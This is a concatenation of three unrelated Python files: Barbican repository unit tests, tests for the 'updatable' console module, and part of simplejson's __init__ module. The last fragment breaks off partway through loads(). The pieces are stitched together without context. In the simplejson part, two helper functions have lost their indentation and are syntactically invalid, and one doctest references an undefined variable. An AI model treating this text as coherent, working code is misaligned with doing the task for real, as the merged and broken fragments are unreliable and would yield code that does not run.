        super(WhenTestingBaseRepository, self).setUp()
        self.repo = repositories.BaseRepo()

    def test_should_raise_invalid_create_from_no_entity(self):
        exception_result = self.assertRaises(
            exception.Invalid,
            self.repo.create_from,
            None)
        self.assertEqual(
            "Must supply non-None Entity.",
            exception_result.message)

    def test_should_raise_invalid_create_from_entity_with_id(self):
        # create_from is for new entities only; a pre-assigned id is invalid.
        entity = models.ModelBase()
        entity.id = '1234'
        exception_result = self.assertRaises(
            exception.Invalid,
            self.repo.create_from,
            entity)
        self.assertEqual(
            "Must supply Entity with id=None (i.e. new entity).",
            exception_result.message)

    def test_should_raise_invalid_do_validate_no_status(self):
        # An empty values dict lacks the mandatory 'status' key.
        exception_result = self.assertRaises(
            exception.Invalid,
            self.repo._do_validate,
            {})
        self.assertEqual(
            "Entity status is required.",
            exception_result.message)

    def test_should_raise_invalid_do_validate_bad_status(self):
        exception_result = self.assertRaises(
            exception.Invalid,
            self.repo._do_validate,
            dict(status='BOGUS_STATUS'))
        self.assertEqual(
            "Invalid status 'BOGUS_STATUS' for Entity.",
            exception_result.message)
class WhenTestingWrapDbError(utils.BaseTestCase):
    """Tests for the repositories.wrap_db_error retry decorator."""

    def setUp(self):
        super(WhenTestingWrapDbError, self).setUp()
        # Disable retries/sleeps so the wrapped error surfaces immediately.
        repositories.CONF.set_override("sql_max_retries", 0)
        repositories.CONF.set_override("sql_retry_interval", 0)

    @mock.patch('barbican.model.repositories.is_db_connection_error')
    def test_should_raise_operational_error_is_connection_error(
            self, mock_is_db_error):
        # Force the decorator down its "connection error" branch.
        mock_is_db_error.return_value = True

        @repositories.wrap_db_error
        def test_function():
            raise sqlalchemy.exc.OperationalError(
                'statement', 'params', 'orig')

        # With retries exhausted, the OperationalError must propagate.
        self.assertRaises(
            sqlalchemy.exc.OperationalError,
            test_function)
class WhenTestingGetEnginePrivate(utils.BaseTestCase):
    """Tests for the private repositories._get_engine factory."""

    def setUp(self):
        super(WhenTestingGetEnginePrivate, self).setUp()
        repositories.CONF.set_override("sql_connection", "connection")

    @mock.patch('barbican.model.repositories._create_engine')
    def test_should_raise_value_exception_engine_create_failure(
            self, mock_create_engine):
        # A failing engine.connect() should be wrapped in BarbicanException.
        engine = mock.MagicMock()
        engine.connect.side_effect = ValueError('Abort!')
        mock_create_engine.return_value = engine
        exception_result = self.assertRaises(
            exception.BarbicanException,
            repositories._get_engine,
            None)
        self.assertEqual(
            'Error configuring registry database with supplied '
            'sql_connection. Got error: Abort!',
            exception_result.message)

    @mock.patch('barbican.model.repositories._create_engine')
    def test_should_complete_with_no_alembic_create_default_configs(
            self, mock_create_engine):
        repositories.CONF.set_override("db_auto_create", False)
        engine = mock.MagicMock()
        mock_create_engine.return_value = engine

        # Invoke method under test.
        repositories._get_engine(None)

        # Default pool settings: no poolclass/size/overflow kwargs expected.
        engine.connect.assert_called_once_with()
        mock_create_engine.assert_called_once_with(
            'connection',
            pool_recycle=3600,
            convert_unicode=True,
            echo=False
        )

    @mock.patch('barbican.model.repositories._create_engine')
    def test_should_complete_with_no_alembic_create_pool_configs(
            self, mock_create_engine):
        repositories.CONF.set_override("db_auto_create", False)
        # Explicit pool configuration should be forwarded to create_engine.
        repositories.CONF.set_override(
            "sql_pool_class", "QueuePool")
        repositories.CONF.set_override("sql_pool_size", 22)
        repositories.CONF.set_override("sql_pool_max_overflow", 11)
        engine = mock.MagicMock()
        mock_create_engine.return_value = engine

        # Invoke method under test.
        repositories._get_engine(None)

        engine.connect.assert_called_once_with()
        mock_create_engine.assert_called_once_with(
            'connection',
            pool_recycle=3600,
            convert_unicode=True,
            echo=False,
            poolclass=sqlalchemy.pool.QueuePool,
            pool_size=22,
            max_overflow=11
        )
class WhenTestingAutoGenerateTables(utils.BaseTestCase):
    """Tests for repositories._auto_generate_tables."""

    @mock.patch('barbican.model.migration.commands.upgrade')
    def test_should_complete_with_alembic_database_update(
            self, mock_commands_upgrade):
        # Pretend the alembic version table already exists.
        existing_tables = {'alembic_version': 'version'}
        fake_engine = 'engine'

        # Invoke method under test.
        repositories._auto_generate_tables(fake_engine, existing_tables)

        # An existing alembic table means a plain upgrade is performed.
        mock_commands_upgrade.assert_called_once_with()
class WhenTestingIsDbConnectionError(utils.BaseTestCase):
    """Tests for repositories.is_db_connection_error."""

    def test_should_return_false_no_error_code_in_args(self):
        # find() returning -1 means no known connection-error code present.
        fake_args = mock.MagicMock()
        fake_args.find.return_value = -1
        self.assertFalse(repositories.is_db_connection_error(fake_args))

    def test_should_return_true_error_code_found_in_args(self):
        fake_args = mock.MagicMock()
        fake_args.find.return_value = 1
        self.assertTrue(repositories.is_db_connection_error(fake_args))
| |
#!/usr/bin/env python
import sys
import unittest
from io import StringIO
from unittest.mock import patch
from argparse import ArgumentTypeError
from updatable.console import _str_to_bool, _list_updates, _list_package_updates, _updatable, _argument_parser
from test.utils import get_environment_requirements_list_monkey, TEST_REQUIREMENTS_PATH
class Capture(list):
    """Context manager that collects stdout lines into this list."""

    def __enter__(self):
        # Swap stdout for an in-memory buffer for the duration of the block.
        self._stdout = sys.stdout
        self._stringio = StringIO()
        sys.stdout = self._stringio
        return self

    def __exit__(self, *args):
        captured = self._stringio.getvalue()
        self.extend(captured.splitlines())
        del self._stringio  # free up memory
        sys.stdout = self._stdout
class TestStrToBool(unittest.TestCase):
    """Tests for console._str_to_bool argument coercion."""

    def test_str_to_bool_true(self):
        for value in (True, 't', 'y', 'True', 'YES', '1'):
            self.assertTrue(_str_to_bool(value))

    def test_str_to_bool_false(self):
        for value in (False, 'f', 'n', 'False', 'NO', '0'):
            self.assertFalse(_str_to_bool(value))

    def test_str_to_bool_exception(self):
        # Unrecognized spellings must raise ArgumentTypeError.
        for value in ('', 'falsy', 'eye'):
            with self.assertRaises(ArgumentTypeError):
                _str_to_bool(value)
class TestListUpdates(unittest.TestCase):
    """Tests for console._list_updates output formatting."""

    def test_with_empty_list(self):
        # Nothing should be printed when there are no releases to show.
        with Capture() as output:
            _list_updates("Test", [], 'MIT')
        self.assertListEqual(output, [])

    def test_with_updates_in_list(self):
        with Capture() as output:
            _list_updates("Test", [
                {"version": "1.0.0", "upload_time": "date 1"},
                {"version": "2.0.0", "upload_time": "date 2"},
            ], 'MIT')
        # A heading line followed by one line per release.
        self.assertListEqual(output, [
            ' Test:',
            ' -- 1.0.0 on date 1 - License: MIT',
            ' -- 2.0.0 on date 2 - License: MIT',
        ])
class TestListPackageUpdates(unittest.TestCase):
    """Tests for console._list_package_updates and the _updatable entry point.

    get_package_update_list is patched with _mock_get_package_update_list,
    which serves canned release data for packages named 'package1'..'package7'.
    """

    # NOTE: declared with *args only and used as side_effect=self._mock_...,
    # so the bound instance lands in args[0] and the first real call
    # argument (the package name) is args[1].
    def _mock_get_package_update_list(*args, **kwargs):
        # No updates, no pre-releases, no non-semantic versions
        if args[1] == 'package1':
            return {
                'newer_releases': 0,
                'pre_releases': 0,
                'major_updates': [],
                'minor_updates': [],
                'patch_updates': [],
                'pre_release_updates': [],
                'non_semantic_versions': [],
                'current_release_license': 'MIT',
            }
        # Updates, no pre-releases, no non-semantic versions
        if args[1] == 'package2':
            return {
                'newer_releases': 5,
                'pre_releases': 0,
                'major_updates': [
                    {"version": "2.0.0", "upload_time": "date 3"},
                    {"version": "3.0.0", "upload_time": "date 5"},
                ],
                'minor_updates': [
                    {"version": "1.5.0", "upload_time": "date 2"},
                    {"version": "2.5.0", "upload_time": "date 4"},
                ],
                'patch_updates': [
                    {"version": "1.5.5", "upload_time": "date 5"},
                ],
                'pre_release_updates': [],
                'non_semantic_versions': [],
                'current_release_license': 'MIT',
            }
        # Updates, no pre-releases, non-semantic versions
        if args[1] == 'package3':
            return {
                'newer_releases': 1,
                'pre_releases': 0,
                'major_updates': [
                ],
                'minor_updates': [
                ],
                'patch_updates': [
                    {"version": "1.5.5", "upload_time": "date 5"},
                ],
                'pre_release_updates': [],
                'non_semantic_versions': [
                    {"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
                ],
                'current_release_license': 'MIT',
            }
        # Updates, pre-releases, non-semantic versions
        if args[1] == 'package4':
            return {
                'newer_releases': 1,
                'pre_releases': 1,
                'major_updates': [
                ],
                'minor_updates': [
                ],
                'patch_updates': [
                    {"version": "1.5.5", "upload_time": "date 5"},
                ],
                'pre_release_updates': [
                    {"version": "alfa-1.5.5", "upload_time": "date 7"},
                ],
                'non_semantic_versions': [
                    {"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
                ],
                'current_release_license': 'MIT',
            }
        # No updates, pre-releases, non-semantic versions
        if args[1] == 'package5':
            return {
                'newer_releases': 0,
                'pre_releases': 1,
                'major_updates': [
                ],
                'minor_updates': [
                ],
                'patch_updates': [],
                'pre_release_updates': [
                    {"version": "alfa-1.5.5", "upload_time": "date 7"},
                ],
                'non_semantic_versions': [
                    {"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
                ],
                'current_release_license': 'MIT',
            }
        # Pre-releases only
        if args[1] == 'package6':
            return {
                'newer_releases': 0,
                'pre_releases': 1,
                'major_updates': [
                ],
                'minor_updates': [
                ],
                'patch_updates': [],
                'pre_release_updates': [
                    {"version": "alfa-1.5.5", "upload_time": "date 7"},
                ],
                'non_semantic_versions': [],
                'current_release_license': 'MIT',
            }
        # Non-semantic versions only
        if args[1] == 'package7':
            return {
                'newer_releases': 0,
                'pre_releases': 0,
                'major_updates': [
                ],
                'minor_updates': [
                ],
                'patch_updates': [],
                'pre_release_updates': [],
                'non_semantic_versions': [
                    {"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
                ],
                'current_release_license': 'MIT',
            }

    # Replacement for console._argument_parser: yields parsed args backed by
    # the monkeypatched requirements list, with pre-releases disabled.
    def _mock_argument_parser(*args, **kwargs):
        class MockResult():
            file = get_environment_requirements_list_monkey()
            pre_releases = False

        class ArgumentParserMock():
            def parse_args(*args, **kwargs):
                return MockResult()
        return ArgumentParserMock()

    def test_with_no_available_updates(self):
        with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
            # No output expected regardless of the pre-releases flag.
            with Capture() as output:
                _list_package_updates("package1", "1.0.0", False)
            self.assertListEqual(output, [])

            with Capture() as output:
                _list_package_updates("package1", "1.0.0", True)
            self.assertListEqual(output, [])

    def test_with_updates_and_no_prereleases(self):
        with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
            with Capture() as output:
                _list_package_updates("package2", "1.0.0", False)
            self.assertListEqual(output, [
                'package2 (1.0.0) - License: MIT',
                ' Major releases:',
                ' -- 2.0.0 on date 3 - License: MIT',
                ' -- 3.0.0 on date 5 - License: MIT',
                ' Minor releases:',
                ' -- 1.5.0 on date 2 - License: MIT',
                ' -- 2.5.0 on date 4 - License: MIT',
                ' Patch releases:',
                ' -- 1.5.5 on date 5 - License: MIT',
                '___'
            ])

            # Same output with pre-releases enabled: package2 has none.
            with Capture() as output:
                _list_package_updates("package2", "1.0.0", True)
            self.assertListEqual(output, [
                'package2 (1.0.0) - License: MIT',
                ' Major releases:',
                ' -- 2.0.0 on date 3 - License: MIT',
                ' -- 3.0.0 on date 5 - License: MIT',
                ' Minor releases:',
                ' -- 1.5.0 on date 2 - License: MIT',
                ' -- 2.5.0 on date 4 - License: MIT',
                ' Patch releases:',
                ' -- 1.5.5 on date 5 - License: MIT',
                '___'
            ])

    def test_with_updates_and_no_prereleases_and_non_semantic_versions(self):
        with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
            with Capture() as output:
                _list_package_updates("package3", "1.0.0", False)
            self.assertListEqual(output, [
                'package3 (1.0.0) - License: MIT',
                ' Patch releases:',
                ' -- 1.5.5 on date 5 - License: MIT',
                ' Unknown releases:',
                ' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
                '___'
            ])

            with Capture() as output:
                _list_package_updates("package3", "1.0.0", True)
            self.assertListEqual(output, [
                'package3 (1.0.0) - License: MIT',
                ' Patch releases:',
                ' -- 1.5.5 on date 5 - License: MIT',
                ' Unknown releases:',
                ' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
                '___'
            ])

    def test_with_updates_and_prereleases_and_non_semantic_versions(self):
        with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
            with Capture() as output:
                _list_package_updates("package4", "1.0.0", False)
            self.assertListEqual(output, [
                'package4 (1.0.0) - License: MIT',
                ' Patch releases:',
                ' -- 1.5.5 on date 5 - License: MIT',
                ' Unknown releases:',
                ' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
                '___'
            ])

            # With the flag enabled, the pre-release section is appended.
            with Capture() as output:
                _list_package_updates("package4", "1.0.0", True)
            self.assertListEqual(output, [
                'package4 (1.0.0) - License: MIT',
                ' Patch releases:',
                ' -- 1.5.5 on date 5 - License: MIT',
                ' Unknown releases:',
                ' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
                ' Pre releases:',
                ' -- alfa-1.5.5 on date 7 - License: MIT',
                '___'
            ])

    def test_with_prereleases_and_non_semantic_versions(self):
        with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
            with Capture() as output:
                _list_package_updates("package5", "1.0.0", False)
            self.assertListEqual(output, [])

            with Capture() as output:
                _list_package_updates("package5", "1.0.0", True)
            self.assertListEqual(output, [
                'package5 (1.0.0) - License: MIT',
                ' Pre releases:',
                ' -- alfa-1.5.5 on date 7 - License: MIT',
                '___'
            ])

    def test_with_prereleases(self):
        with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
            with Capture() as output:
                _list_package_updates("package6", "1.0.0", False)
            self.assertListEqual(output, [])

            with Capture() as output:
                _list_package_updates("package6", "1.0.0", True)
            self.assertListEqual(output, [
                'package6 (1.0.0) - License: MIT',
                ' Pre releases:',
                ' -- alfa-1.5.5 on date 7 - License: MIT',
                '___'
            ])

    def test_with_non_semantic_versions(self):
        with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
            # Non-semantic versions alone never produce output.
            with Capture() as output:
                _list_package_updates("package7", "1.0.0", False)
            self.assertListEqual(output, [])

            with Capture() as output:
                _list_package_updates("package7", "1.0.0", True)
            self.assertListEqual(output, [])

    def test_updatable_call(self):
        # End-to-end: _updatable reads the mocked requirements file and
        # reports only packages with visible updates (2, 3 and 4).
        with patch('updatable.console._argument_parser', side_effect=self._mock_argument_parser):
            with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
                with Capture() as output:
                    _updatable()
                self.assertListEqual(output, [
                    'package2 (1.0) - License: MIT',
                    ' Major releases:',
                    ' -- 2.0.0 on date 3 - License: MIT',
                    ' -- 3.0.0 on date 5 - License: MIT',
                    ' Minor releases:',
                    ' -- 1.5.0 on date 2 - License: MIT',
                    ' -- 2.5.0 on date 4 - License: MIT',
                    ' Patch releases:',
                    ' -- 1.5.5 on date 5 - License: MIT',
                    '___',
                    'package3 (2) - License: MIT',
                    ' Patch releases:',
                    ' -- 1.5.5 on date 5 - License: MIT',
                    ' Unknown releases:',
                    ' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
                    '___',
                    'package4 (2.4) - License: MIT',
                    ' Patch releases:',
                    ' -- 1.5.5 on date 5 - License: MIT',
                    ' Unknown releases:',
                    ' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
                    '___'
                ])
class TestArgumentParser(unittest.TestCase):
    """Tests for console._argument_parser CLI argument handling."""

    # Spellings accepted by _str_to_bool, as exercised by the original tests.
    TRUTHY_VALUES = ['True', 'Yes', 'T', 't', '1', 'TrUe']
    FALSY_VALUES = ['f', 'n', '0', 'FaLse']

    # Contents of the test requirements file, one line per package.
    EXPECTED_REQUIREMENTS = [
        "package1==0.1\n",
        "package2==1.0\n",
        "package3==2\n",
        "package4==2.4\n",
        "package5==3.0.0"
    ]

    def setUp(self):
        self.parser = _argument_parser()

    def _check_pre_release_flag(self, flag):
        # Verify one flag spelling parses every truthy/falsy value and
        # rejects an invalid one with SystemExit (argparse error path).
        for value in self.TRUTHY_VALUES:
            parsed = self.parser.parse_args([flag, value])
            self.assertEqual(parsed.pre_releases, True)
        for value in self.FALSY_VALUES:
            parsed = self.parser.parse_args([flag, value])
            self.assertEqual(parsed.pre_releases, False)
        with self.assertRaises(SystemExit):
            self.parser.parse_args([flag, 'Invalid'])

    def test_argument_parser_pre_release(self):
        # Long param
        self._check_pre_release_flag('--pre-release')
        # Short param
        self._check_pre_release_flag('-pr')

    def test_invalid_argument(self):
        with self.assertRaises(SystemExit):
            self.parser.parse_args(['--invalid', 'Value'])

    def test_argument_parser_pre_file(self):
        for flag in ('--file', '-f'):
            parsed = self.parser.parse_args([flag, TEST_REQUIREMENTS_PATH])
            self.assertEqual(list(parsed.file), self.EXPECTED_REQUIREMENTS)
            # A nonexistent path makes argparse bail out with SystemExit.
            with self.assertRaises(SystemExit):
                self.parser.parse_args([flag, 'Invalid'])
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| |
r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> s = json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=' ')
>>> print '\n'.join([l.rstrip() for l in s.splitlines()])
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... raise TypeError(repr(o) + " is not JSON serializable")
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
# Package release version.
__version__ = '2.1.3'
# Names exported as the public API of the package.
__all__ = [
    'dump', 'dumps', 'load', 'loads',
    'JSONDecoder', 'JSONDecodeError', 'JSONEncoder',
    'OrderedDict',
]
__author__ = 'Bob Ippolito <bob@redivi.com>'
from decimal import Decimal
from decoder import JSONDecoder, JSONDecodeError
from encoder import JSONEncoder
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import ordered_dict
return ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
def _import_c_make_encoder():
try:
from simplejson._speedups import make_encoder
return make_encoder
except ImportError:
return None
# Shared JSONEncoder instance configured with the documented defaults.
# NOTE(review): presumably reused by dump()/dumps() as a fast path when
# called with all-default arguments -- confirm against those functions.
_default_encoder = JSONEncoder(
    skipkeys=False,
    ensure_ascii=True,
    check_circular=True,
    allow_nan=True,
    indent=None,
    separators=None,
    encoding='utf-8',
    default=None,
    use_decimal=False,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
        allow_nan=True, cls=None, indent=None, separators=None,
        encoding='utf-8', default=None, use_decimal=False, **kw):
    """Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
    ``.write()``-supporting file-like object).

    If ``skipkeys`` is true then ``dict`` keys that are not basic types
    (``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
    will be skipped instead of raising a ``TypeError``.

    If ``ensure_ascii`` is false, then the some chunks written to ``fp``
    may be ``unicode`` instances, subject to normal Python ``str`` to
    ``unicode`` coercion rules. Unless ``fp.write()`` explicitly
    understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
    to cause an error.

    If ``check_circular`` is false, then the circular reference check
    for container types will be skipped and a circular reference will
    result in an ``OverflowError`` (or worse).

    If ``allow_nan`` is false, then it will be a ``ValueError`` to
    serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
    in strict compliance of the JSON specification, instead of using the
    JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).

    If *indent* is a string, then JSON array elements and object members
    will be pretty-printed with a newline followed by that string repeated
    for each level of nesting. ``None`` (the default) selects the most compact
    representation without any newlines. For backwards compatibility with
    versions of simplejson earlier than 2.1.0, an integer is also accepted
    and is converted to a string with that many spaces.

    If ``separators`` is an ``(item_separator, dict_separator)`` tuple
    then it will be used instead of the default ``(', ', ': ')`` separators.
    ``(',', ':')`` is the most compact JSON representation.

    ``encoding`` is the character encoding for str instances, default is UTF-8.

    ``default(obj)`` is a function that should return a serializable version
    of obj or raise TypeError. The default simply raises TypeError.

    If *use_decimal* is true (default: ``False``) then decimal.Decimal
    will be natively serialized to JSON with full precision.

    To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
    ``.default()`` method to serialize additional types), specify it with
    the ``cls`` kwarg.

    """
    # Fast path: reuse the cached module-level encoder when every option is
    # at its default. ``not use_decimal`` must be part of this check (as in
    # ``dumps``); otherwise ``use_decimal=True`` with otherwise-default
    # arguments would be silently ignored, since the cached encoder was
    # built with use_decimal=False.
    if (not skipkeys and ensure_ascii and
        check_circular and allow_nan and
        cls is None and indent is None and separators is None and
        encoding == 'utf-8' and default is None and not use_decimal
        and not kw):
        iterable = _default_encoder.iterencode(obj)
    else:
        if cls is None:
            cls = JSONEncoder
        iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
            check_circular=check_circular, allow_nan=allow_nan, indent=indent,
            separators=separators, encoding=encoding,
            default=default, use_decimal=use_decimal, **kw).iterencode(obj)
    # could accelerate with writelines in some versions of Python, at
    # a debuggability cost
    for chunk in iterable:
        fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
        allow_nan=True, cls=None, indent=None, separators=None,
        encoding='utf-8', default=None, use_decimal=False, **kw):
    """Serialize ``obj`` to a JSON formatted ``str``.

    If ``skipkeys`` is true then ``dict`` keys that are not basic types
    (``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
    will be skipped instead of raising a ``TypeError``.

    If ``ensure_ascii`` is false, then the return value will be a
    ``unicode`` instance subject to normal Python ``str`` to ``unicode``
    coercion rules instead of being escaped to an ASCII ``str``.

    If ``check_circular`` is false, then the circular reference check
    for container types will be skipped and a circular reference will
    result in an ``OverflowError`` (or worse).

    If ``allow_nan`` is false, then it will be a ``ValueError`` to
    serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
    strict compliance of the JSON specification, instead of using the
    JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).

    If ``indent`` is a string, then JSON array elements and object members
    will be pretty-printed with a newline followed by that string repeated
    for each level of nesting. ``None`` (the default) selects the most compact
    representation without any newlines. For backwards compatibility with
    versions of simplejson earlier than 2.1.0, an integer is also accepted
    and is converted to a string with that many spaces.

    If ``separators`` is an ``(item_separator, dict_separator)`` tuple
    then it will be used instead of the default ``(', ', ': ')`` separators.
    ``(',', ':')`` is the most compact JSON representation.

    ``encoding`` is the character encoding for str instances, default is UTF-8.

    ``default(obj)`` is a function that should return a serializable version
    of obj or raise TypeError. The default simply raises TypeError.

    If *use_decimal* is true (default: ``False``) then decimal.Decimal
    will be natively serialized to JSON with full precision.

    To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
    ``.default()`` method to serialize additional types), specify it with
    the ``cls`` kwarg.

    """
    # cached encoder: reuse the module-level _default_encoder when every
    # option is at its default value.
    if (not skipkeys and ensure_ascii and
        check_circular and allow_nan and
        cls is None and indent is None and separators is None and
        encoding == 'utf-8' and default is None and not use_decimal
        and not kw):
        return _default_encoder.encode(obj)
    if cls is None:
        cls = JSONEncoder
    return cls(
        skipkeys=skipkeys, ensure_ascii=ensure_ascii,
        check_circular=check_circular, allow_nan=allow_nan, indent=indent,
        separators=separators, encoding=encoding, default=default,
        use_decimal=use_decimal, **kw).encode(obj)
# Module-level decoder shared by loads() when it is called with all-default
# arguments.
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
                               object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
        parse_int=None, parse_constant=None, object_pairs_hook=None,
        use_decimal=False, **kw):
    """Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
    a JSON document) to a Python object.

    *encoding* determines the encoding used to interpret any
    :class:`str` objects decoded by this instance (``'utf-8'`` by
    default). It has no effect when decoding :class:`unicode` objects.
    Note that currently only encodings that are a superset of ASCII work,
    strings of other encodings should be passed in as :class:`unicode`.

    *object_hook*, if specified, will be called with the result of every
    JSON object decoded and its return value will be used in place of the
    given :class:`dict`. This can be used to provide custom
    deserializations (e.g. to support JSON-RPC class hinting).

    *object_pairs_hook* is an optional function that will be called with
    the result of any object literal decode with an ordered list of pairs.
    The return value of *object_pairs_hook* will be used instead of the
    :class:`dict`. This feature can be used to implement custom decoders
    that rely on the order that the key and value pairs are decoded (for
    example, :func:`collections.OrderedDict` will remember the order of
    insertion). If *object_hook* is also defined, the *object_pairs_hook*
    takes priority.

    *parse_float*, if specified, will be called with the string of every
    JSON float to be decoded. By default, this is equivalent to
    ``float(num_str)``. This can be used to use another datatype or parser
    for JSON floats (e.g. :class:`decimal.Decimal`).

    *parse_int*, if specified, will be called with the string of every
    JSON int to be decoded. By default, this is equivalent to
    ``int(num_str)``. This can be used to use another datatype or parser
    for JSON integers (e.g. :class:`float`).

    *parse_constant*, if specified, will be called with one of the
    following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
    can be used to raise an exception if invalid JSON numbers are
    encountered.

    If *use_decimal* is true (default: ``False``) then it implies
    parse_float=decimal.Decimal for parity with ``dump``.

    To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
    kwarg.

    """
    # Thin wrapper: slurp the stream and delegate all option handling
    # (including the fast path for default arguments) to loads().
    document = fp.read()
    return loads(
        document,
        encoding=encoding,
        cls=cls,
        object_hook=object_hook,
        parse_float=parse_float,
        parse_int=parse_int,
        parse_constant=parse_constant,
        object_pairs_hook=object_pairs_hook,
        use_decimal=use_decimal,
        **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
        parse_int=None, parse_constant=None, object_pairs_hook=None,
        use_decimal=False, **kw):
    """Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
    document) to a Python object.

    *encoding* determines the encoding used to interpret any
    :class:`str` objects decoded by this instance (``'utf-8'`` by
    default). It has no effect when decoding :class:`unicode` objects.
    Note that currently only encodings that are a superset of ASCII work,
    strings of other encodings should be passed in as :class:`unicode`.

    *object_hook*, if specified, will be called with the result of every
    JSON object decoded and its return value will be used in place of the
    given :class:`dict`. This can be used to provide custom
    deserializations (e.g. to support JSON-RPC class hinting).

    *object_pairs_hook* is an optional function that will be called with
    the result of any object literal decode with an ordered list of pairs.
    The return value of *object_pairs_hook* will be used instead of the
    :class:`dict`. This feature can be used to implement custom decoders
    that rely on the order that the key and value pairs are decoded (for
    example, :func:`collections.OrderedDict` will remember the order of
    insertion). If *object_hook* is also defined, the *object_pairs_hook*
    takes priority.

    *parse_float*, if specified, will be called with the string of every
    JSON float to be decoded. By default, this is equivalent to
    ``float(num_str)``. This can be used to use another datatype or parser
    for JSON floats (e.g. :class:`decimal.Decimal`).

    *parse_int*, if specified, will be called with the string of every
    JSON int to be decoded. By default, this is equivalent to
    ``int(num_str)``. This can be used to use another datatype or parser
    for JSON integers (e.g. :class:`float`).

    *parse_constant*, if specified, will be called with one of the
    following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
    can be used to raise an exception if invalid JSON numbers are
    encountered.

    If *use_decimal* is true (default: ``False``) then it implies
    parse_float=decimal.Decimal for parity with ``dump``.

    To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
    kwarg.

    """
    # Fast path: reuse the cached module-level decoder when every option is
    # at its default value.
    if (cls is None and encoding is None and object_hook is None and
            parse_int is None and parse_float is None and
            parse_constant is None and object_pairs_hook is None
            and not use_decimal and not kw):
        return _default_decoder.decode(s)
    if cls is None:
        cls = JSONDecoder
